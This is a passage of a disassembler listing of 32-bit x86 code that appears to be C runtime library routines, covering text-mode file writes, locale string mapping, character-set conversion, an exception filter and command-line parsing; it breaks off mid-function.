; ---------------------------------------------------------------------------
loc_42E895: ; CODE XREF: sub_42E6A0+1DD�j
mov ecx, [ebp+var_C]
mov edx, [ecx+0Ch]
and edx, 2000h
test edx, edx
jz short loc_42E8AE
mov eax, [ebp+var_10]
add eax, 1
mov [ebp+var_10], eax
loc_42E8AE: ; CODE XREF: sub_42E6A0+203�j
jmp short loc_42E924
; ---------------------------------------------------------------------------
loc_42E8B0: ; CODE XREF: sub_42E6A0+1B5�j
push 0
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+var_8]
push edx
call sub_42E4E0
add esp, 0Ch
cmp [ebp+var_10], 200h
ja short loc_42E8F0
mov eax, [ebp+var_C]
mov ecx, [eax+0Ch]
and ecx, 8
test ecx, ecx
jz short loc_42E8F0
mov edx, [ebp+var_C]
mov eax, [edx+0Ch]
and eax, 400h
test eax, eax
jnz short loc_42E8F0
mov [ebp+var_10], 200h
jmp short loc_42E8F9
; ---------------------------------------------------------------------------
loc_42E8F0: ; CODE XREF: sub_42E6A0+229�j
; sub_42E6A0+236�j ...
mov ecx, [ebp+var_C]
mov edx, [ecx+18h]
mov [ebp+var_10], edx
loc_42E8F9: ; CODE XREF: sub_42E6A0+24E�j
mov eax, [ebp+var_8]
sar eax, 5
mov ecx, [ebp+var_8]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 4
test eax, eax
jz short loc_42E924
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_42E924: ; CODE XREF: sub_42E6A0+19C�j
; sub_42E6A0:loc_42E8AE�j ...
mov edx, [ebp+var_1C]
sub edx, [ebp+var_10]
mov [ebp+var_1C], edx
loc_42E92D: ; CODE XREF: sub_42E6A0+148�j
; sub_42E6A0+15E�j
mov eax, [ebp+var_1C]
add eax, [ebp+var_18]
loc_42E933: ; CODE XREF: sub_42E6A0+71�j
; sub_42E6A0+91�j ...
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42E6A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E940 proc near ; CODE XREF: sub_421200+147�p
; sub_422F20+57�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
cmp eax, ds:dword_4F37C0
jnb short loc_42E971
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 1
test ecx, ecx
jnz short loc_42E98C
loc_42E971: ; CODE XREF: sub_42E940+D�j
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_42E9BE
; ---------------------------------------------------------------------------
loc_42E98C: ; CODE XREF: sub_42E940+2F�j
mov edx, [ebp+arg_0]
push edx
call sub_431070
add esp, 4
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42E9D0
add esp, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
call sub_431100
add esp, 4
mov eax, [ebp+var_4]
loc_42E9BE: ; CODE XREF: sub_42E940+4A�j
mov esp, ebp
pop ebp
retn
sub_42E940 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E9D0 proc near ; CODE XREF: sub_42E940+64�p
; sub_435EC0+145�p
var_420 = dword ptr -420h
var_41C = byte ptr -41Ch
var_418 = dword ptr -418h
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov [ebp+var_10], 0
mov eax, [ebp+var_10]
mov [ebp+var_420], eax
cmp [ebp+arg_8], 0
jnz short loc_42E9F6
xor eax, eax
jmp loc_42EC3F
; ---------------------------------------------------------------------------
loc_42E9F6: ; CODE XREF: sub_42E9D0+1D�j
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
movsx ecx, byte ptr [eax+edx+4]
and ecx, 20h
test ecx, ecx
jz short loc_42EA28
push 2
push 0
mov edx, [ebp+arg_0]
push edx
call sub_42E570
add esp, 0Ch
loc_42EA28: ; CODE XREF: sub_42E9D0+46�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 80h
test eax, eax
jz loc_42EB5C
mov ecx, [ebp+arg_4]
mov [ebp+var_4], ecx
mov [ebp+var_C], 0
loc_42EA5D: ; CODE XREF: sub_42E9D0:loc_42EB55�j
mov edx, [ebp+var_4]
sub edx, [ebp+arg_4]
cmp edx, [ebp+arg_8]
jnb loc_42EB5A
lea eax, [ebp+var_414]
mov [ebp+var_8], eax
loc_42EA75: ; CODE XREF: sub_42E9D0+115�j
mov ecx, [ebp+var_8]
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jge short loc_42EAE7
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jnb short loc_42EAE7
mov ecx, [ebp+var_4]
mov dl, [ecx]
mov [ebp+var_41C], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
movsx ecx, [ebp+var_41C]
cmp ecx, 0Ah
jnz short loc_42EAD1
mov edx, [ebp+var_420]
add edx, 1
mov [ebp+var_420], edx
mov eax, [ebp+var_8]
mov byte ptr [eax], 0Dh
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
loc_42EAD1: ; CODE XREF: sub_42E9D0+E1�j
mov edx, [ebp+var_8]
mov al, [ebp+var_41C]
mov [edx], al
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
jmp short loc_42EA75
; ---------------------------------------------------------------------------
loc_42EAE7: ; CODE XREF: sub_42E9D0+B6�j
; sub_42E9D0+C1�j
push 0
lea edx, [ebp+var_418]
push edx
mov eax, [ebp+var_8]
lea ecx, [ebp+var_414]
sub eax, ecx
push eax
lea edx, [ebp+var_414]
push edx
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
mov eax, [edx+ecx]
push eax
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jz short loc_42EB4A
mov ecx, [ebp+var_10]
add ecx, [ebp+var_418]
mov [ebp+var_10], ecx
mov edx, [ebp+var_8]
lea eax, [ebp+var_414]
sub edx, eax
cmp [ebp+var_418], edx
jge short loc_42EB48
jmp short loc_42EB5A
; ---------------------------------------------------------------------------
loc_42EB48: ; CODE XREF: sub_42E9D0+174�j
jmp short loc_42EB55
; ---------------------------------------------------------------------------
loc_42EB4A: ; CODE XREF: sub_42E9D0+155�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_C], eax
jmp short loc_42EB5A
; ---------------------------------------------------------------------------
loc_42EB55: ; CODE XREF: sub_42E9D0:loc_42EB48�j
jmp loc_42EA5D
; ---------------------------------------------------------------------------
loc_42EB5A: ; CODE XREF: sub_42E9D0+96�j
; sub_42E9D0+176�j ...
jmp short loc_42EBAC
; ---------------------------------------------------------------------------
loc_42EB5C: ; CODE XREF: sub_42E9D0+7A�j
push 0
lea ecx, [ebp+var_418]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
sar ecx, 5
mov edx, [ebp+arg_0]
and edx, 1Fh
imul edx, 24h
mov eax, ds:dword_4F36C0[ecx*4]
mov ecx, [eax+edx]
push ecx
call ds:dword_4F53B4 ; WriteFile
test eax, eax
jz short loc_42EBA3
mov [ebp+var_C], 0
mov edx, [ebp+var_418]
mov [ebp+var_10], edx
jmp short loc_42EBAC
; ---------------------------------------------------------------------------
loc_42EBA3: ; CODE XREF: sub_42E9D0+1BF�j
call ds:dword_4F5360 ; RtlGetLastWin32Error
mov [ebp+var_C], eax
loc_42EBAC: ; CODE XREF: sub_42E9D0:loc_42EB5A�j
; sub_42E9D0+1D1�j
cmp [ebp+var_10], 0
jnz loc_42EC36
cmp [ebp+var_C], 0
jz short loc_42EBEA
cmp [ebp+var_C], 5
jnz short loc_42EBD9
call sub_429A90
mov dword ptr [eax], 9
call sub_429AA0
mov ecx, [ebp+var_C]
mov [eax], ecx
jmp short loc_42EBE5
; ---------------------------------------------------------------------------
loc_42EBD9: ; CODE XREF: sub_42E9D0+1F0�j
mov edx, [ebp+var_C]
push edx
call sub_4299F0
add esp, 4
loc_42EBE5: ; CODE XREF: sub_42E9D0+207�j
or eax, 0FFFFFFFFh
jmp short loc_42EC3F
; ---------------------------------------------------------------------------
loc_42EBEA: ; CODE XREF: sub_42E9D0+1EA�j
mov eax, [ebp+arg_0]
sar eax, 5
mov ecx, [ebp+arg_0]
and ecx, 1Fh
imul ecx, 24h
mov edx, ds:dword_4F36C0[eax*4]
movsx eax, byte ptr [edx+ecx+4]
and eax, 40h
test eax, eax
jz short loc_42EC1B
mov ecx, [ebp+arg_4]
movsx edx, byte ptr [ecx]
cmp edx, 1Ah
jnz short loc_42EC1B
xor eax, eax
jmp short loc_42EC3F
; ---------------------------------------------------------------------------
loc_42EC1B: ; CODE XREF: sub_42E9D0+23A�j
; sub_42E9D0+245�j
call sub_429A90
mov dword ptr [eax], 1Ch
call sub_429AA0
mov dword ptr [eax], 0
or eax, 0FFFFFFFFh
jmp short loc_42EC3F
; ---------------------------------------------------------------------------
loc_42EC36: ; CODE XREF: sub_42E9D0+1E0�j
mov eax, [ebp+var_10]
sub eax, [ebp+var_420]
loc_42EC3F: ; CODE XREF: sub_42E9D0+21�j
; sub_42E9D0+218�j ...
mov esp, ebp
pop ebp
retn
sub_42E9D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EC50 proc near ; CODE XREF: sub_421620+11E�p
; sub_421620+16F�p ...
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_43D418
push offset sub_423364
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFDCh
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp ds:dword_4F341C, 0
jnz short loc_42ECD6
push 0
push 0
push 1
push offset dword_43D410
push 100h
push 0
call ds:dword_4F5330 ; LCMapStringW
test eax, eax
jz short loc_42ECA7
mov ds:dword_4F341C, 1
jmp short loc_42ECD6
; ---------------------------------------------------------------------------
loc_42ECA7: ; CODE XREF: sub_42EC50+49�j
push 0
push 0
push 1
push offset dword_43D40C
push 100h
push 0
call ds:dword_4F5334 ; LCMapStringA
test eax, eax
jz short loc_42ECCF
mov ds:dword_4F341C, 2
jmp short loc_42ECD6
; ---------------------------------------------------------------------------
loc_42ECCF: ; CODE XREF: sub_42EC50+71�j
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42ECD6: ; CODE XREF: sub_42EC50+2D�j
; sub_42EC50+55�j ...
cmp [ebp+arg_C], 0
jle short loc_42ECEF
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
call sub_42EF60
add esp, 8
mov [ebp+arg_C], eax
loc_42ECEF: ; CODE XREF: sub_42EC50+8A�j
cmp ds:dword_4F341C, 2
jnz short loc_42ED1B
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F5334 ; LCMapStringA
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42ED1B: ; CODE XREF: sub_42EC50+A6�j
cmp ds:dword_4F341C, 1
jnz loc_42EF3F
cmp [ebp+arg_18], 0
jnz short loc_42ED37
mov edx, ds:dword_4F3408
mov [ebp+arg_18], edx
loc_42ED37: ; CODE XREF: sub_42EC50+DC�j
push 0
push 0
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_1C]
neg edx
sbb edx, edx
and edx, 8
add edx, 1
push edx
mov eax, [ebp+arg_18]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_42ED6B
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42ED6B: ; CODE XREF: sub_42EC50+112�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_30], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_30]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42EDAD
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_42EDAD: ; CODE XREF: sub_42EC50+144�j
cmp [ebp+var_24], 0
jnz short loc_42EDBA
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42EDBA: ; CODE XREF: sub_42EC50+161�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4F5454 ; MultiByteToWideChar
test eax, eax
jnz short loc_42EDE1
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42EDE1: ; CODE XREF: sub_42EC50+188�j
push 0
push 0
mov ecx, [ebp+var_1C]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F5330 ; LCMapStringW
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_42EE0B
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42EE0B: ; CODE XREF: sub_42EC50+1B2�j
mov edx, [ebp+arg_4]
and edx, 400h
test edx, edx
jz short loc_42EE5B
cmp [ebp+arg_14], 0
jz short loc_42EE56
mov eax, [ebp+var_28]
cmp eax, [ebp+arg_14]
jle short loc_42EE2D
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42EE2D: ; CODE XREF: sub_42EC50+1D4�j
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+var_1C]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F5330 ; LCMapStringW
test eax, eax
jnz short loc_42EE56
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42EE56: ; CODE XREF: sub_42EC50+1CC�j
; sub_42EC50+1FD�j
jmp loc_42EF3A
; ---------------------------------------------------------------------------
loc_42EE5B: ; CODE XREF: sub_42EC50+1C6�j
mov ecx, [ebp+var_28]
mov [ebp+var_2C], ecx
mov [ebp+var_4], 1
mov eax, [ebp+var_2C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_41EF80
mov [ebp+var_34], esp
mov [ebp+var_18], esp
mov edx, [ebp+var_34]
mov [ebp+var_20], edx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42EEA3
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_42EEA3: ; CODE XREF: sub_42EC50+23A�j
cmp [ebp+var_20], 0
jnz short loc_42EEB0
xor eax, eax
jmp loc_42EF41
; ---------------------------------------------------------------------------
loc_42EEB0: ; CODE XREF: sub_42EC50+257�j
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4F5330 ; LCMapStringW
test eax, eax
jnz short loc_42EED6
xor eax, eax
jmp short loc_42EF41
; ---------------------------------------------------------------------------
loc_42EED6: ; CODE XREF: sub_42EC50+280�j
cmp [ebp+arg_14], 0
jnz short loc_42EF0A
push 0
push 0
push 0
push 0
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_20]
push ecx
push 220h
mov edx, [ebp+arg_18]
push edx
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_42EF08
xor eax, eax
jmp short loc_42EF41
; ---------------------------------------------------------------------------
loc_42EF08: ; CODE XREF: sub_42EC50+2B2�j
jmp short loc_42EF3A
; ---------------------------------------------------------------------------
loc_42EF0A: ; CODE XREF: sub_42EC50+28A�j
push 0
push 0
mov eax, [ebp+arg_14]
push eax
mov ecx, [ebp+arg_10]
push ecx
mov edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_20]
push eax
push 220h
mov ecx, [ebp+arg_18]
push ecx
call ds:dword_4F5450 ; WideCharToMultiByte
mov [ebp+var_28], eax
cmp [ebp+var_28], 0
jnz short loc_42EF3A
xor eax, eax
jmp short loc_42EF41
; ---------------------------------------------------------------------------
loc_42EF3A: ; CODE XREF: sub_42EC50:loc_42EE56�j
; sub_42EC50:loc_42EF08�j ...
mov eax, [ebp+var_28]
jmp short loc_42EF41
; ---------------------------------------------------------------------------
loc_42EF3F: ; CODE XREF: sub_42EC50+D2�j
xor eax, eax
loc_42EF41: ; CODE XREF: sub_42EC50+81�j
; sub_42EC50+C6�j ...
lea esp, [ebp-40h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42EC50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EF60 proc near ; CODE XREF: sub_42EC50+94�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
loc_42EF72: ; CODE XREF: sub_42EF60+35�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_8], eax
test edx, edx
jz short loc_42EF97
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_42EF97
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_42EF72
; ---------------------------------------------------------------------------
loc_42EF97: ; CODE XREF: sub_42EF60+20�j
; sub_42EF60+2A�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_42EFA9
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
jmp short loc_42EFAC
; ---------------------------------------------------------------------------
loc_42EFA9: ; CODE XREF: sub_42EF60+3F�j
mov eax, [ebp+arg_4]
loc_42EFAC: ; CODE XREF: sub_42EF60+47�j
mov esp, ebp
pop ebp
retn
sub_42EF60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EFB0 proc near ; CODE XREF: _0:00422244�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
call sub_428EE0
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [eax+50h]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42F170
add esp, 8
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_42EFE3
mov eax, [ebp+var_10]
cmp dword ptr [eax+8], 0
jnz short loc_42EFF2
loc_42EFE3: ; CODE XREF: sub_42EFB0+28�j
mov ecx, [ebp+arg_4]
push ecx
call ds:dword_4F532C ; UnhandledExceptionFilter
jmp loc_42F16A
; ---------------------------------------------------------------------------
loc_42EFF2: ; CODE XREF: sub_42EFB0+31�j
mov edx, [ebp+var_10]
cmp dword ptr [edx+8], 5
jnz short loc_42F00F
mov eax, [ebp+var_10]
mov dword ptr [eax+8], 0
mov eax, 1
jmp loc_42F16A
; ---------------------------------------------------------------------------
loc_42F00F: ; CODE XREF: sub_42EFB0+49�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx+8], 1
jnz short loc_42F020
or eax, 0FFFFFFFFh
jmp loc_42F16A
; ---------------------------------------------------------------------------
loc_42F020: ; CODE XREF: sub_42EFB0+66�j
mov edx, [ebp+var_10]
mov eax, [edx+8]
mov [ebp+var_4], eax
mov ecx, [ebp+var_8]
mov edx, [ecx+54h]
mov [ebp+var_18], edx
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
mov [eax+54h], ecx
mov edx, [ebp+var_10]
cmp dword ptr [edx+4], 8
jnz loc_42F147
mov eax, ds:dword_454380
mov [ebp+var_14], eax
jmp short loc_42F05B
; ---------------------------------------------------------------------------
loc_42F052: ; CODE XREF: sub_42EFB0+D0�j
mov ecx, [ebp+var_14]
add ecx, 1
mov [ebp+var_14], ecx
loc_42F05B: ; CODE XREF: sub_42EFB0+A0�j
mov edx, ds:dword_454380
add edx, ds:dword_454384
cmp [ebp+var_14], edx
jge short loc_42F082
mov eax, [ebp+var_14]
imul eax, 0Ch
mov ecx, [ebp+var_8]
mov edx, [ecx+50h]
mov dword ptr [edx+eax+8], 0
jmp short loc_42F052
; ---------------------------------------------------------------------------
loc_42F082: ; CODE XREF: sub_42EFB0+BA�j
mov eax, [ebp+var_8]
mov ecx, [eax+58h]
mov [ebp+var_C], ecx
mov edx, [ebp+var_10]
cmp dword ptr [edx], 0C000008Eh
jnz short loc_42F0A5
mov eax, [ebp+var_8]
mov dword ptr [eax+58h], 83h
jmp loc_42F12D
; ---------------------------------------------------------------------------
loc_42F0A5: ; CODE XREF: sub_42EFB0+E4�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx], 0C0000090h
jnz short loc_42F0BC
mov edx, [ebp+var_8]
mov dword ptr [edx+58h], 81h
jmp short loc_42F12D
; ---------------------------------------------------------------------------
loc_42F0BC: ; CODE XREF: sub_42EFB0+FE�j
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0C0000091h
jnz short loc_42F0D3
mov ecx, [ebp+var_8]
mov dword ptr [ecx+58h], 84h
jmp short loc_42F12D
; ---------------------------------------------------------------------------
loc_42F0D3: ; CODE XREF: sub_42EFB0+115�j
mov edx, [ebp+var_10]
cmp dword ptr [edx], 0C0000093h
jnz short loc_42F0EA
mov eax, [ebp+var_8]
mov dword ptr [eax+58h], 85h
jmp short loc_42F12D
; ---------------------------------------------------------------------------
loc_42F0EA: ; CODE XREF: sub_42EFB0+12C�j
mov ecx, [ebp+var_10]
cmp dword ptr [ecx], 0C000008Dh
jnz short loc_42F101
mov edx, [ebp+var_8]
mov dword ptr [edx+58h], 82h
jmp short loc_42F12D
; ---------------------------------------------------------------------------
loc_42F101: ; CODE XREF: sub_42EFB0+143�j
mov eax, [ebp+var_10]
cmp dword ptr [eax], 0C000008Fh
jnz short loc_42F118
mov ecx, [ebp+var_8]
mov dword ptr [ecx+58h], 86h
jmp short loc_42F12D
; ---------------------------------------------------------------------------
loc_42F118: ; CODE XREF: sub_42EFB0+15A�j
mov edx, [ebp+var_10]
cmp dword ptr [edx], 0C0000092h
jnz short loc_42F12D
mov eax, [ebp+var_8]
mov dword ptr [eax+58h], 8Ah
loc_42F12D: ; CODE XREF: sub_42EFB0+F0�j
; sub_42EFB0+10A�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+58h]
push edx
push 8
call [ebp+var_4]
add esp, 8
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
mov [eax+58h], ecx
jmp short loc_42F15E
; ---------------------------------------------------------------------------
loc_42F147: ; CODE XREF: sub_42EFB0+92�j
mov edx, [ebp+var_10]
mov dword ptr [edx+8], 0
mov eax, [ebp+var_10]
mov ecx, [eax+4]
push ecx
call [ebp+var_4]
add esp, 4
loc_42F15E: ; CODE XREF: sub_42EFB0+195�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_18]
mov [edx+54h], eax
or eax, 0FFFFFFFFh
loc_42F16A: ; CODE XREF: sub_42EFB0+3D�j
; sub_42EFB0+5A�j ...
mov esp, ebp
pop ebp
retn
sub_42EFB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F170 proc near ; CODE XREF: sub_42EFB0+19�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
loc_42F17A: ; CODE XREF: sub_42F170+30�j
mov ecx, [ebp+var_4]
mov edx, [ecx]
cmp edx, [ebp+arg_0]
jz short loc_42F1A2
mov eax, [ebp+var_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov ecx, ds:dword_45438C
imul ecx, 0Ch
mov edx, [ebp+arg_4]
add edx, ecx
cmp [ebp+var_4], edx
jnb short loc_42F1A2
jmp short loc_42F17A
; ---------------------------------------------------------------------------
loc_42F1A2: ; CODE XREF: sub_42F170+12�j
; sub_42F170+2E�j
mov eax, ds:dword_45438C
imul eax, 0Ch
mov ecx, [ebp+arg_4]
add ecx, eax
cmp [ebp+var_4], ecx
jnb short loc_42F1BE
mov edx, [ebp+var_4]
mov eax, [edx]
cmp eax, [ebp+arg_0]
jz short loc_42F1C2
loc_42F1BE: ; CODE XREF: sub_42F170+42�j
xor eax, eax
jmp short loc_42F1C5
; ---------------------------------------------------------------------------
loc_42F1C2: ; CODE XREF: sub_42F170+4C�j
mov eax, [ebp+var_4]
loc_42F1C5: ; CODE XREF: sub_42F170+50�j
mov esp, ebp
pop ebp
retn
sub_42F170 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F1D0 proc near ; CODE XREF: _0:004221E8�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
cmp ds:dword_4F4A2C, 0
jnz short loc_42F1E2
call sub_429890
loc_42F1E2: ; CODE XREF: sub_42F1D0+B�j
mov eax, ds:dword_4F4A24
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 22h
jnz short loc_42F24C
loc_42F1F6: ; CODE XREF: sub_42F1D0:loc_42F233�j
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 22h
jz short loc_42F235
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
test ecx, ecx
jz short loc_42F235
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
push eax
call sub_435D50
add esp, 4
test eax, eax
jz short loc_42F233
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42F233: ; CODE XREF: sub_42F1D0+58�j
jmp short loc_42F1F6
; ---------------------------------------------------------------------------
loc_42F235: ; CODE XREF: sub_42F1D0+39�j
; sub_42F1D0+44�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
cmp eax, 22h
jnz short loc_42F24A
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_42F24A: ; CODE XREF: sub_42F1D0+6F�j
jmp short loc_42F263
; ---------------------------------------------------------------------------
loc_42F24C: ; CODE XREF: sub_42F1D0+24�j
; sub_42F1D0+91�j
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
cmp eax, 20h
jle short loc_42F263
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
jmp short loc_42F24C
; ---------------------------------------------------------------------------
loc_42F263: ; CODE XREF: sub_42F1D0:loc_42F24A�j
; sub_42F1D0+86�j ...
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_42F285
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
cmp edx, 20h
jg short loc_42F285
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_42F263
; ---------------------------------------------------------------------------
loc_42F285: ; CODE XREF: sub_42F1D0+9C�j
; sub_42F1D0+A8�j
